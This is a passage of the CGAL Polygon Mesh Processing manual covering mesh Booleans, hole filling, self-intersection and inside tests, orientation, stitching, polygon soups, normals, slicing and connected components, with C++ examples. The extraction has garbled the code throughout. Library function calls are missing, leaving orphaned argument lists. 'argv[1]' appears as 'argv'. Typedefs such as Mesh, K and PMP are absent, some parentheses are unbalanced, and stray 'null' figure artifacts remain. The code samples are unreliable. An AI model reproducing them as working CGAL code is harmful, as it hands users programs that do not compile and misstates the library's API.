numbers.\n\n## Examples\n\n### Computing the Union of Two Volumes\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Surface_mesh.h>\n#include <CGAL/Polygon_mesh_processing/corefinement.h>\n#include <fstream>\nint main(int argc, char* argv[])\n{\nconst char* filename1 = (argc > 1) ? argv : \"data/blobby.off\";\nconst char* filename2 = (argc > 2) ? argv : \"data/eight.off\";\nstd::ifstream input(filename1);\nMesh mesh1, mesh2;\nif (!input || !(input >> mesh1))\n{\nstd::cerr << \"First mesh is not a valid off file.\" << std::endl;\nreturn 1;\n}\ninput.close();\ninput.open(filename2);\nif (!input || !(input >> mesh2))\n{\nstd::cerr << \"Second mesh is not a valid off file.\" << std::endl;\nreturn 1;\n}\nMesh out;\nbool valid_union = PMP::corefine_and_compute_union(mesh1,mesh2, out);\nif (valid_union)\n{\nstd::cout << \"Union was successfully computed\\n\";\nstd::ofstream output(\"union.off\");\noutput << out;\nreturn 0;\n}\nstd::cout << \"Union could not be computed\\n\";\nreturn 1;\n}\n\n### Boolean Operation and Local Remeshing\n\nThis example is similar to the previous one, but here we substract a volume and update the first input triangulated surface mesh (in-place operation). The edges that are on the intersection of the input meshes are marked and the region around them is remeshed isotropically while preserving the intersection polyline.\nFile Polygon_mesh_processing/corefinement_difference_remeshed.cpp\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Surface_mesh.h>\n#include <CGAL/Polygon_mesh_processing/corefinement.h>\n#include <CGAL/Polygon_mesh_processing/remesh.h>\n#include <CGAL/boost/graph/selection.h>\n#include <fstream>\ntypedef boost::graph_traits<Mesh>::edge_descriptor edge_descriptor;\ntypedef boost::graph_traits<Mesh>::face_descriptor face_descriptor;\ntypedef boost::graph_traits<Mesh>::halfedge_descriptor halfedge_descriptor;\nnamespace params = PMP::parameters;\nstruct Vector_pmap_wrapper{\nstd::vector<bool>& vect;\nVector_pmap_wrapper(std::vector<bool>& v) : vect(v) {}\nfriend bool get(const Vector_pmap_wrapper& m, face_descriptor f)\n{\nreturn m.vect[f];\n}\nfriend void put(const Vector_pmap_wrapper& m, face_descriptor f, bool b)\n{\nm.vect[f]=b;\n}\n};\nint main(int argc, char* argv[])\n{\nconst char* filename1 = (argc > 1) ? argv : \"data/blobby.off\";\nconst char* filename2 = (argc > 2) ? argv : \"data/eight.off\";\nstd::ifstream input(filename1);\nMesh mesh1, mesh2;\nif (!input || !(input >> mesh1))\n{\nstd::cerr << \"First mesh is not a valid off file.\" << std::endl;\nreturn 1;\n}\ninput.close();\ninput.open(filename2);\nif (!input || !(input >> mesh2))\n{\nstd::cerr << \"Second mesh is not a valid off file.\" << std::endl;\nreturn 1;\n}\n//create a property on edges to indicate whether they are constrained\nMesh::Property_map<edge_descriptor,bool> is_constrained_map =\n// update mesh1 to contain the mesh bounding the difference\n// of the two input volumes.\nbool valid_difference =\nmesh2,\nmesh1,\nparams::all_default(), // default parameters for mesh1\nparams::all_default(), // default parameters for mesh2\nparams::edge_is_constrained_map(is_constrained_map));\nif (valid_difference)\n{\nstd::cout << \"Difference was successfully computed\\n\";\nstd::ofstream output(\"difference.off\");\noutput << mesh1;\n}\nelse{\nstd::cout << \"Difference could not be computed\\n\";\nreturn 1;\n}\n// collect faces incident to a constrained edge\nstd::vector<face_descriptor> selected_faces;\nstd::vector<bool> is_selected(num_faces(mesh1), false);\nBOOST_FOREACH(edge_descriptor e, edges(mesh1))\nif (is_constrained_map[e])\n{\n// insert all faces incident to the target vertex\nBOOST_FOREACH(halfedge_descriptor h,\nhalfedges_around_target(halfedge(e,mesh1),mesh1))\n{\nif (!is_border(h, mesh1) )\n{\nface_descriptor f=face(h, mesh1);\nif ( !is_selected[f] )\n{\nselected_faces.push_back(f);\nis_selected[f]=true;\n}\n}\n}\n}\n// increase the face selection\nCGAL::expand_face_selection(selected_faces, mesh1, 2,\nVector_pmap_wrapper(is_selected), std::back_inserter(selected_faces));\nstd::cout << selected_faces.size()\n<< \" faces were selected for the remeshing step\\n\";\n// remesh the region around the intersection polylines\nselected_faces,\n0.02,\nmesh1,\nparams::edge_is_constrained_map(is_constrained_map) );\nstd::ofstream output(\"difference_remeshed.off\");\noutput << mesh1;\nreturn 0;\n}\n\n### Robustness of Consecutive Operations\n\nThis example computes the intersection of two volumes and then does the union of the result with one of the input volumes. This operation is in general not possible when using inexact constructions. Instead of using a mesh with a point from a kernel with exact constructions, the exact points are a property of the mesh vertices that we can reuse in a later operations. With that property, we can manipulate a mesh with points having floating point coordinates but benefit from the robustness provided by the exact constructions.\nFile Polygon_mesh_processing/corefinement_consecutive_bool_op.cpp\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Exact_predicates_exact_constructions_kernel.h>\n#include <CGAL/Surface_mesh.h>\n#include <CGAL/Polygon_mesh_processing/corefinement.h>\n#include <fstream>\ntypedef boost::graph_traits<Mesh>::vertex_descriptor vertex_descriptor;\ntypedef Mesh::Property_map<vertex_descriptor,EK::Point_3> Exact_point_map;\ntypedef Mesh::Property_map<vertex_descriptor,bool> Exact_point_computed;\nnamespace params = PMP::parameters;\nstruct Coref_point_map\n{\n// typedef for the property map\ntypedef boost::property_traits<Exact_point_map>::value_type value_type;\ntypedef boost::property_traits<Exact_point_map>::reference reference;\ntypedef boost::property_traits<Exact_point_map>::category category;\ntypedef boost::property_traits<Exact_point_map>::key_type key_type;\n// exterior references\nExact_point_computed* exact_point_computed_ptr;\nExact_point_map* exact_point_ptr;\nMesh* mesh_ptr;\nExact_point_computed& exact_point_computed() const\n{\nCGAL_assertion(exact_point_computed_ptr!=NULL);\nreturn *exact_point_computed_ptr;\n}\nExact_point_map& exact_point() const\n{\nCGAL_assertion(exact_point_ptr!=NULL);\nreturn *exact_point_ptr;\n}\nMesh& mesh() const\n{\nCGAL_assertion(mesh_ptr!=NULL);\nreturn *mesh_ptr;\n}\n// Converters\nCoref_point_map()\n: exact_point_computed_ptr(NULL)\n, exact_point_ptr(NULL)\n, mesh_ptr(NULL)\n{}\nCoref_point_map(Exact_point_map& ep,\nExact_point_computed& epc,\nMesh& m)\n: exact_point_computed_ptr(&epc)\n, exact_point_ptr(&ep)\n, mesh_ptr(&m)\n{}\nfriend\nreference get(const Coref_point_map& map, key_type k)\n{\n// create exact point if it does not exist\nif (!map.exact_point_computed()[k]){\nmap.exact_point()[k]=map.to_exact(map.mesh().point(k));\nmap.exact_point_computed()[k]=true;\n}\nreturn map.exact_point()[k];\n}\nfriend\nvoid put(const Coref_point_map& map, key_type k, const EK::Point_3& p)\n{\nmap.exact_point_computed()[k]=true;\nmap.exact_point()[k]=p;\n// create the input point from the exact one\nmap.mesh().point(k)=map.to_input(p);\n}\n};\nint main(int argc, char* argv[])\n{\nconst char* filename1 = (argc > 1) ? argv : \"data/blobby.off\";\nconst char* filename2 = (argc > 2) ? argv : \"data/eight.off\";\nstd::ifstream input(filename1);\nMesh mesh1, mesh2;\nif (!input || !(input >> mesh1))\n{\nstd::cerr << \"First mesh is not a valid off file.\" << std::endl;\nreturn 1;\n}\ninput.close();\ninput.open(filename2);\nif (!input || !(input >> mesh2))\n{\nstd::cerr << \"Second mesh is not a valid off file.\" << std::endl;\nreturn 1;\n}\nExact_point_map mesh1_exact_points =\nExact_point_computed mesh1_exact_points_computed =\nExact_point_map mesh2_exact_points =\nExact_point_computed mesh2_exact_points_computed =\nCoref_point_map mesh1_pm(mesh1_exact_points, mesh1_exact_points_computed, mesh1);\nCoref_point_map mesh2_pm(mesh2_exact_points, mesh2_exact_points_computed, mesh2);\nmesh2,\nmesh1,\nparams::vertex_point_map(mesh1_pm),\nparams::vertex_point_map(mesh2_pm),\nparams::vertex_point_map(mesh1_pm) ) )\n{\nmesh2,\nmesh2,\nparams::vertex_point_map(mesh1_pm),\nparams::vertex_point_map(mesh2_pm),\nparams::vertex_point_map(mesh2_pm) ) )\n{\nstd::cout << \"Intersection and union were successfully computed\\n\";\nstd::ofstream output(\"inter_union.off\");\noutput << mesh2;\nreturn 0;\n}\nstd::cout << \"Union could not be computed\\n\";\nreturn 1;\n}\nstd::cout << \"Intersection could not be computed\\n\";\nreturn 1;\n}\n\n# Hole Filling\n\nThis package provides an algorithm for filling one closed hole that is either in a triangulated surface mesh or defined by a sequence of points that describe a polyline. The main steps of the algorithm are described in and can be summarized as follows.\n\nFirst, the largest patch triangulating the boundary of the hole is generated without introducing any new vertex. The patch is selected so as to minimize a quality function evaluated for all possible triangular patches. The quality function first minimizes the worst dihedral angle between patch triangles, then the total surface area of the patch as a tiebreaker. Following the suggestions in , the performance of the algorithm is significantly improved by narrowing the search space to faces of a 3D Delaunay triangulation of the hole boundary vertices, from all possible patches, while searching for the best patch with respect to the aforementioned quality criteria.\n\nFor some complicated input hole boundary, the generated patch may have self-intersections. After hole filling, the generated patch can be refined and faired using the meshing functions CGAL::Polygon_mesh_processing::refine() and CGAL::Polygon_mesh_processing::fair() described in Section Meshing.", null, "Figure 60.5 Results of the main steps of the algorithm. From left to right: (a) the hole, (b) the hole after its triangulation, (c) after triangulation and refinement, (d) after triangulation, refinement and fairing.\n\n## API\n\nThis package provides four functions for hole filling:\n\n• triangulate_hole_polyline() : given a sequence of points defining the hole, triangulates the hole.\n• triangulate_hole() : given a border halfedge on the boundary of the hole on a mesh, triangulates the hole.\n• triangulate_and_refine_hole() : in addition to triangulate_hole() the generated patch is refined.\n• triangulate_refine_and_fair_hole() : in addition to triangulate_and_refine_hole() the generated patch is also faired.\n\n## Examples\n\n### Triangulate a Polyline\n\nThe following example triangulates a hole described by an input polyline.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Polygon_mesh_processing/triangulate_hole.h>\n#include <CGAL/utility.h>\n#include <vector>\n#include <iterator>\ntypedef Kernel::Point_3 Point;\nint main()\n{\nstd::vector<Point> polyline;\npolyline.push_back(Point( 1.,0.,0.));\npolyline.push_back(Point( 0.,1.,0.));\npolyline.push_back(Point(-1.,0.,0.));\npolyline.push_back(Point( 1.,1.,0.));\n// repeating first point (i.e. polyline.push_back(Point(1.,0.,0.)) ) is optional\n// any type, having Type(int, int, int) constructor available, can be used to hold output triangles\ntypedef CGAL::Triple<int, int, int> Triangle_int;\nstd::vector<Triangle_int> patch;\npatch.reserve(polyline.size() -2); // there will be exactly n-2 triangles in the patch\npolyline,\nstd::back_inserter(patch));\nfor(std::size_t i = 0; i < patch.size(); ++i)\n{\nstd::cout << \"Triangle \" << i << \": \"\n<< patch[i].first << \" \" << patch[i].second << \" \" << patch[i].third\n<< std::endl;\n}\n// note that no degenerate triangles are generated in the patch\nstd::vector<Point> polyline_collinear;\npolyline_collinear.push_back(Point(1.,0.,0.));\npolyline_collinear.push_back(Point(2.,0.,0.));\npolyline_collinear.push_back(Point(3.,0.,0.));\npolyline_collinear.push_back(Point(4.,0.,0.));\nstd::vector<Triangle_int> patch_will_be_empty;\npolyline_collinear,\nback_inserter(patch_will_be_empty));\nCGAL_assertion(patch_will_be_empty.empty());\nreturn 0;\n}\n\n### Hole Filling From the Border of the Hole\n\nIf the input polygon mesh has a hole or more than one hole, it is possible to iteratively fill them by detecting border edges (i.e. with only one incident non-null face) after each hole filling step.\n\nHoles are filled one after the other, and the process stops when there is no border edge left.\n\nThis process is illustrated by the example below, where holes are iteratively filled, refined and faired to get a faired mesh with no hole.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Polyhedron_3.h>\n#include <CGAL/Polygon_mesh_processing/triangulate_hole.h>\n#include <iostream>\n#include <fstream>\n#include <vector>\n#include <boost/foreach.hpp>\ntypedef CGAL::Polyhedron_3<Kernel> Polyhedron;\ntypedef Polyhedron::Halfedge_handle Halfedge_handle;\ntypedef Polyhedron::Facet_handle Facet_handle;\ntypedef Polyhedron::Vertex_handle Vertex_handle;\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? argv : \"data/mech-holes-shark.off\";\nstd::ifstream input(filename);\nPolyhedron poly;\nif ( !input || !(input >> poly) || poly.empty() ) {\nstd::cerr << \"Not a valid off file.\" << std::endl;\nreturn 1;\n}\n// Incrementally fill the holes\nunsigned int nb_holes = 0;\nBOOST_FOREACH(Halfedge_handle h, halfedges(poly))\n{\nif(h->is_border())\n{\nstd::vector<Facet_handle> patch_facets;\nstd::vector<Vertex_handle> patch_vertices;\nbool success = CGAL::cpp11::get<0>(\npoly,\nh,\nstd::back_inserter(patch_facets),\nstd::back_inserter(patch_vertices),\nCGAL::Polygon_mesh_processing::parameters::vertex_point_map(get(CGAL::vertex_point, poly)).\ngeom_traits(Kernel())) );\nstd::cout << \" Number of facets in constructed patch: \" << patch_facets.size() << std::endl;\nstd::cout << \" Number of vertices in constructed patch: \" << patch_vertices.size() << std::endl;\nstd::cout << \" Fairing : \" << (success ? \"succeeded\" : \"failed\") << std::endl;\n++nb_holes;\n}\n}\nstd::cout << std::endl;\nstd::cout << nb_holes << \" holes have been filled\" << std::endl;\nstd::ofstream out(\"filled.off\");\nout.precision(17);\nout << poly << std::endl;\nreturn 0;\n}", null, "Figure 60.6 Holes in the fork model are filled with triangle patches.\n\n## Performance\n\nThe hole filling algorithm has a complexity which depends on the number of vertices. While has a running time of $$O(n^3)$$ , in most cases has running time of $$O(n \\log n)$$. We were running triangulate_refine_and_fair_hole() for the below meshes (and two more meshes with smaller holes). The machine used is a PC running Windows 10 with an Intel Core i7 CPU clocked at 2.70 GHz. The program has been compiled with Visual C++ 2013 compiler with the O2 option which maximizes speed.", null, "Figure 60.7 The elephant on the left/right has a hole with 963/7657 vertices.\n\nThis takes time\n\n# vertices without Delaunay (sec.) with Delaunay (sec.)\n565 8.5 0.03\n774 21 0.035\n967 43 0.06\n7657 na 0.4\n\n# Predicates\n\nThis packages provides several predicates to be evaluated with respect to a triangle mesh.\n\n## Self Intersections\n\nSelf intersections can be detected from a triangle mesh, by calling the predicate CGAL::Polygon_mesh_processing::does_self_intersect(). Additionally, the function CGAL::Polygon_mesh_processing::self_intersections() reports all pairs of intersecting triangles.", null, "Figure 60.8 Detecting self-intersections on a triangle mesh. The intersecting triangles are displayed in dark grey on the right image.\n\n### Self Intersections Example\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Surface_mesh.h>\n#include <CGAL/Polygon_mesh_processing/self_intersections.h>\n#include <fstream>\ntypedef boost::graph_traits<Mesh>::face_descriptor face_descriptor;\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? argv : \"data/pig.off\";\nstd::ifstream input(filename);\nMesh mesh;\nif (!input || !(input >> mesh) || !CGAL::is_triangle_mesh(mesh))\n{\nstd::cerr << \"Not a valid input file.\" << std::endl;\nreturn 1;\n}\nbool intersecting = PMP::does_self_intersect(mesh,\nPMP::parameters::vertex_point_map(get(CGAL::vertex_point, mesh)));\nstd::cout\n<< (intersecting ? \"There are self-intersections.\" : \"There is no self-intersection.\")\n<< std::endl;\nstd::vector<std::pair<face_descriptor, face_descriptor> > intersected_tris;\nPMP::self_intersections(mesh, std::back_inserter(intersected_tris));\nstd::cout << intersected_tris.size() << \" pairs of triangles intersect.\" << std::endl;\nreturn 0;\n}\n\n## Side of Triangle Mesh\n\nThe class CGAL::Side_of_triangle_mesh provides a functor that tests whether a query point is inside, outside, or on the boundary of the domain bounded by a given closed triangle mesh.\n\nA point is said to be on the bounded side of the domain bounded by the input triangle mesh if an odd number of surfaces is crossed when walking from the point to infinity. The input triangle mesh is expected to contain no self-intersections and to be free from self-inclusions.\n\nThe algorithm can handle the case of a triangle mesh with several connected components, and returns correct results. In case of self-inclusions, the ray intersections parity test is performed, and the execution will not fail. However, the user should be aware that the predicate alternately considers sub-volumes to be on the bounded and unbounded sides of the input triangle mesh.\n\n### Inside Test Example\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Polyhedron_3.h>\n#include <CGAL/point_generators_3.h>\n#include <CGAL/Side_of_triangle_mesh.h>\n#include <vector>\n#include <fstream>\n#include <limits>\n#include <boost/foreach.hpp>\ntypedef K::Point_3 Point;\ntypedef CGAL::Polyhedron_3<K> Polyhedron;\ndouble max_coordinate(const Polyhedron& poly)\n{\ndouble max_coord = -std::numeric_limits<double>::infinity();\nBOOST_FOREACH(Polyhedron::Vertex_handle v, vertices(poly))\n{\nPoint p = v->point();\nmax_coord = (std::max)(max_coord, p.x());\nmax_coord = (std::max)(max_coord, p.y());\nmax_coord = (std::max)(max_coord, p.z());\n}\nreturn max_coord;\n}\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? argv : \"data/eight.off\";\nstd::ifstream input(filename);\nPolyhedron poly;\nif (!input || !(input >> poly) || poly.empty()\n{\nstd::cerr << \"Not a valid input file.\" << std::endl;\nreturn 1;\n}\ndouble size = max_coordinate(poly);\nunsigned int nb_points = 100;\nstd::vector<Point> points;\npoints.reserve(nb_points);\nCGAL::Random_points_in_cube_3<Point> gen(size);\nfor (unsigned int i = 0; i < nb_points; ++i)\npoints.push_back(*gen++);\nstd::cout << \"Test \" << nb_points << \" random points in cube \"\n<< \"[-\" << size << \"; \" << size <<\"]\" << std::endl;\nint nb_inside = 0;\nint nb_boundary = 0;\nfor (std::size_t i = 0; i < nb_points; ++i)\n{\nCGAL::Bounded_side res = inside(points[i]);\nif (res == CGAL::ON_BOUNDED_SIDE) { ++nb_inside; }\nif (res == CGAL::ON_BOUNDARY) { ++nb_boundary; }\n}\nstd::cerr << \"Total query size: \" << points.size() << std::endl;\nstd::cerr << \" \" << nb_inside << \" points inside \" << std::endl;\nstd::cerr << \" \" << nb_boundary << \" points on boundary \" << std::endl;\nstd::cerr << \" \" << points.size() - nb_inside - nb_boundary << \" points outside \" << std::endl;\nreturn 0;\n}\n\n## Intersections Detection\n\nIntersection tests between triangle meshes and/or polylines can be done using CGAL::Polygon_mesh_processing::do_intersect() . Additionally, the function CGAL::Polygon_mesh_processing::intersecting_meshes() records all pairs of intersecting meshes in a range.\n\n# Orientation\n\nThis package provides functions dealing with the orientation of faces in a closed polygon mesh.\n\nThe function CGAL::Polygon_mesh_processing::is_outward_oriented() checks whether an oriented polygon mesh is oriented such that the normals to all faces are oriented towards the outside of the domain bounded by the input polygon mesh.\n\nThe function CGAL::Polygon_mesh_processing::reverse_face_orientations() reverses the orientation of halfedges around faces. As a consequence, the normal computed for each face (see Section Computing Normals) is also reversed.\n\nThe Polygon Soup Example puts these functions at work on a polygon soup.\n\nThe function CGAL::Polygon_mesh_processing::orient() makes each connected component of a closed polygon mesh outward or inward oriented.\n\nThe function CGAL::Polygon_mesh_processing::orient_to_bound_a_volume() orients the connected components of a closed polygon mesh so that it bounds a volume (see Definitions for the precise definition).\n\n# Combinatorial Repairing\n\n## Stitching\n\nIt happens that a polygon mesh has several edges and vertices that are duplicated. For those edges and vertices, the connectivity of the mesh is incomplete, if not considered incorrect.\n\nStitching the borders of such a polygon mesh consists in two main steps. First, border edges that are similar but duplicated are detected and paired. Then, they are \"stitched\" together so that the edges and vertices duplicates are removed from the mesh, and each of these remaining edges is incident to exactly two faces.\n\nThe function CGAL::Polygon_mesh_processing::stitch_borders() performs such repairing operation. The input mesh should be manifold. Otherwise, stitching is not guaranteed to succeed.\n\n### Stitching Example\n\nThe following example applies the stitching operation to a simple quad mesh with duplicated border edges.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Polyhedron_3.h>\n#include <CGAL/Polygon_mesh_processing/stitch_borders.h>\n#include <iostream>\n#include <fstream>\ntypedef CGAL::Polyhedron_3<K> Polyhedron;\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? argv : \"data/full_border_quads.off\";\nstd::ifstream input(filename);\nPolyhedron mesh;\nif (!input || !(input >> mesh) || mesh.is_empty()) {\nstd::cerr << \"Not a valid off file.\" << std::endl;\nreturn 1;\n}\nstd::cout << \"Before stitching : \" << std::endl;\nstd::cout << \"\\t Number of vertices :\\t\" << mesh.size_of_vertices() << std::endl;\nstd::cout << \"\\t Number of halfedges :\\t\" << mesh.size_of_halfedges() << std::endl;\nstd::cout << \"\\t Number of facets :\\t\" << mesh.size_of_facets() << std::endl;\nstd::cout << \"Stitching done : \" << std::endl;\nstd::cout << \"\\t Number of vertices :\\t\" << mesh.size_of_vertices() << std::endl;\nstd::cout << \"\\t Number of halfedges :\\t\" << mesh.size_of_halfedges() << std::endl;\nstd::cout << \"\\t Number of facets :\\t\" << mesh.size_of_facets() << std::endl;\nstd::ofstream output(\"mesh_stitched.off\");\noutput << std::setprecision(17) << mesh;\nreturn 0;\n}\n\n## Polygon Soups\n\nWhen the faces of a polygon mesh are given but the connectivity is unknown, we must deal with of a polygon soup.\n\nBefore running any of the algorithms on the so-called polygon soup, one should ensure that the polygons are consistently oriented. To do so, this package provides the function CGAL::Polygon_mesh_processing::orient_polygon_soup(), described in .\n\nTo deal with polygon soups that cannot be converted to a combinatorial manifold surface, some points are duplicated. Because a polygon soup does not have any connectivity (each point has as many occurences as the number of polygons it belongs to), duplicating one point (or a pair of points) amounts to duplicate the polygon to which it belongs.\n\nThe duplicated points are either an endpoint of an edge incident to more than two polygons, an endpoint of an edge between two polygons with incompatible orientations (during the re-orientation process), or more generally a point p at which the intersection of an infinitesimally small ball centered at p with the polygons incident to it is not a topological disk.\n\nOnce the polygon soup is consistently oriented, with possibly duplicated (or more) points, the connectivity can be recovered and made consistent to build a valid polygon mesh. The function CGAL::Polygon_mesh_processing::polygon_soup_to_polygon_mesh() performs this mesh construction step.\n\n### Polygon Soup Example\n\nThis example shows how to generate a mesh from a polygon soup. The first step is to get a soup of consistently oriented faces, before rebuilding the connectivity. In this example, some orientation tests are performed on the output polygon mesh to illustrate Section Orientation.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Polyhedron_3.h>\n#include <CGAL/Polygon_mesh_processing/orient_polygon_soup.h>\n#include <CGAL/Polygon_mesh_processing/polygon_soup_to_polygon_mesh.h>\n#include <CGAL/Polygon_mesh_processing/orientation.h>\n#include <vector>\n#include <fstream>\n#include <iostream>\ntypedef CGAL::Polyhedron_3<K> Polyhedron;\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? argv : \"data/tet-shuffled.off\";\nstd::ifstream input(filename);\nif (!input)\n{\nstd::cerr << \"Cannot open file \" << std::endl;\nreturn 1;\n}\nstd::vector<K::Point_3> points;\nstd::vector< std::vector<std::size_t> > polygons;\n{\nstd::cerr << \"Error parsing the OFF file \" << std::endl;\nreturn 1;\n}\nPolyhedron mesh;\nstd::ofstream out(\"tet-oriented1.off\");\nout << mesh;\nout.close();\nstd::ofstream out2(\"tet-oriented2.off\");\nout2 << mesh;\nout2.close();\nreturn 0;\n}\n\n# Computing Normals\n\nThis package provides methods to compute normals on the polygon mesh. The normal can either be computed for each single face, or estimated for each vertex, as the average of its incident face normals. These computations are performed with :\n\n• CGAL::Polygon_mesh_processing::compute_face_normal()\n• CGAL::Polygon_mesh_processing::compute_vertex_normal()\n\nWe further provide functions to compute all the normals to faces, or to vertices, or to both :\n\n• CGAL::Polygon_mesh_processing::compute_face_normals()\n• CGAL::Polygon_mesh_processing::compute_vertex_normals()\n• CGAL::Polygon_mesh_processing::compute_normals().\n\nProperty maps are used to record the computed normals.\n\n## Normals Computation Examples\n\nProperty maps are an API introduced in the boost library, that allows to associate values to keys. In the following examples we associate a normal vector to each vertex and to each face.\n\n### Normals Computation for a Surface Mesh\n\nThe following example illustrates how to compute the normals to faces and vertices and store them in property maps provided by the class Surface_mesh.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Surface_mesh.h>\n#include <CGAL/Polygon_mesh_processing/compute_normal.h>\n#include <iostream>\n#include <fstream>\ntypedef K::Point_3 Point;\ntypedef K::Vector_3 Vector;\ntypedef CGAL::Surface_mesh<Point> Surface_mesh;\ntypedef boost::graph_traits<Surface_mesh>::vertex_descriptor vertex_descriptor;\ntypedef boost::graph_traits<Surface_mesh>::face_descriptor face_descriptor;\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? argv : \"data/eight.off\";\nstd::ifstream input(filename);\nSurface_mesh mesh;\nif (!input || !(input >> mesh) || mesh.is_empty()) {\nstd::cerr << \"Not a valid off file.\" << std::endl;\nreturn 1;\n}\n(\"f:normals\", CGAL::NULL_VECTOR).first;\n(\"v:normals\", CGAL::NULL_VECTOR).first;\nvnormals,\nfnormals,\nCGAL::Polygon_mesh_processing::parameters::vertex_point_map(mesh.points()).\ngeom_traits(K()));\nstd::cout << \"Face normals :\" << std::endl;\nfor(face_descriptor fd: faces(mesh)){\nstd::cout << fnormals[fd] << std::endl;\n}\nstd::cout << \"Vertex normals :\" << std::endl;\nfor(vertex_descriptor vd: vertices(mesh)){\nstd::cout << vnormals[vd] << std::endl;\n}\nreturn 0;\n}\n\n### Normals Computation for a Poyhedron_3\n\nThe following example illustrates how to compute the normals to faces and vertices and store them in ordered or unordered maps as the class Polyhedron does not provide storage for the normals.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Polyhedron_3.h>\n#include <CGAL/Polygon_mesh_processing/compute_normal.h>\n#include <boost/property_map/property_map.hpp>\n#include <map>\n// #include <CGAL/Unique_hash_map.h>\n// #include <boost/unordered_map.hpp>\n#include <iostream>\n#include <fstream>\ntypedef K::Point_3 Point;\ntypedef K::Vector_3 Vector;\ntypedef CGAL::Polyhedron_3<K> Polyhedron;\ntypedef boost::graph_traits<Polyhedron>::vertex_descriptor vertex_descriptor;\ntypedef boost::graph_traits<Polyhedron>::face_descriptor face_descriptor;\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? argv : \"data/eight.off\";\nstd::ifstream input(filename);\nPolyhedron mesh;\nif (!input || !(input >> mesh) || mesh.is_empty()) {\nstd::cerr << \"Not a valid off file.\" << std::endl;\nreturn 1;\n}\nstd::map<face_descriptor,Vector> fnormals;\nstd::map<vertex_descriptor,Vector> vnormals;\n// Instead of std::map you may use std::unordered_map, boost::unordered_map\n// or CGAL::Unique_hash_map\n// CGAL::Unique_hash_map<face_descriptor,Vector> fnormals;\n// boost::unordered_map<vertex_descriptor,Vector> vnormals;\nboost::make_assoc_property_map(vnormals),\nboost::make_assoc_property_map(fnormals));\nstd::cout << \"Face normals :\" << std::endl;\nfor(face_descriptor fd: faces(mesh)){\nstd::cout << fnormals[fd] << std::endl;\n}\nstd::cout << \"Vertex normals :\" << std::endl;\nfor(vertex_descriptor vd: vertices(mesh)){\nstd::cout << vnormals[vd] << std::endl;\n}\nreturn 0;\n}\n\n# Slicer\n\nThe CGAL::Polygon_mesh_slicer is an operator that intersects a triangle surface mesh with a plane. It records the intersection as a set of polylines since the intersection can be made of more than one connected component. The degenerate case where the intersection is a single point is handled.\n\nFigure 60.9 shows the polylines returned by the slicing operation for a triangle mesh and a set of parallel planes.", null, "Figure 60.9 Slicing a mesh. A triangle mesh (left) and the polylines computed by the mesh slicer by intersecting a set of parallel planes (right).\n\n## Slicer Example\n\nThe example below illustrates how to use the mesh slicer for a given triangle mesh and a plane. Two constructors are used in the example for pedagogical purposes.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Surface_mesh.h>\n#include <CGAL/AABB_halfedge_graph_segment_primitive.h>\n#include <CGAL/AABB_tree.h>\n#include <CGAL/AABB_traits.h>\n#include <CGAL/Polygon_mesh_slicer.h>\n#include <fstream>\ntypedef std::vector<K::Point_3> Polyline_type;\ntypedef std::list< Polyline_type > Polylines;\ntypedef CGAL::AABB_traits<K, HGSP> AABB_traits;\ntypedef CGAL::AABB_tree<AABB_traits> AABB_tree;\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? argv : \"data/eight.off\";\nstd::ifstream input(filename);\nMesh mesh;\nif (!input || !(input >> mesh) || mesh.is_empty()\nstd::cerr << \"Not a valid input file.\" << std::endl;\nreturn 1;\n}\n// Slicer constructor from the mesh\nPolylines polylines;\nslicer(K::Plane_3(0, 0, 1, -0.4), std::back_inserter(polylines));\nstd::cout << \"At z = 0.4, the slicer intersects \"\n<< polylines.size() << \" polylines\" << std::endl;\npolylines.clear();\nslicer(K::Plane_3(0, 0, 1, 0.2), std::back_inserter(polylines));\nstd::cout << \"At z = -0.2, the slicer intersects \"\n<< polylines.size() << \" polylines\" << std::endl;\npolylines.clear();\n// Use the Slicer constructor from a pre-built AABB_tree\nAABB_tree tree(edges(mesh).first, edges(mesh).second, mesh);\nCGAL::Polygon_mesh_slicer<Mesh, K> slicer_aabb(mesh, tree);\nslicer_aabb(K::Plane_3(0, 0, 1, -0.4), std::back_inserter(polylines));\nstd::cout << \"At z = 0.4, the slicer intersects \"\n<< polylines.size() << \" polylines\" << std::endl;\npolylines.clear();\nreturn 0;\n}\n\n# Connected Components\n\nThis package provides functions to enumerate and store the connected components of a polygon mesh. The connected components can be either closed and geometrically separated, or separated by border or user-specified constraint edges.\n\nFirst, the function CGAL::Polygon_mesh_processing::connected_component() collects all the faces that belong to the same connected component as the face that is given as a parameter.\n\nThen, CGAL::Polygon_mesh_processing::connected_components() collects all the connected components, and fills a property map with the indices of the different connected components.\n\nThe functions CGAL::Polygon_mesh_processing::keep_connected_components() and CGAL::Polygon_mesh_processing::remove_connected_components() enable the user to keep and remove only a selection of connected components, provided either as a range of faces that belong to the desired connected components or as a range of connected component ids (one or more per connected component).\n\nFinally, CGAL::Polygon_mesh_processing::keep_largest_connected_components() enables the user to keep only the largest connected components. This feature can for example be useful for noisy data were small connected components should be discarded in favour of major connected components.\n\n## Connected Components Example\n\nThe first example shows how to record the connected components of a polygon mesh. In particular, we provide an 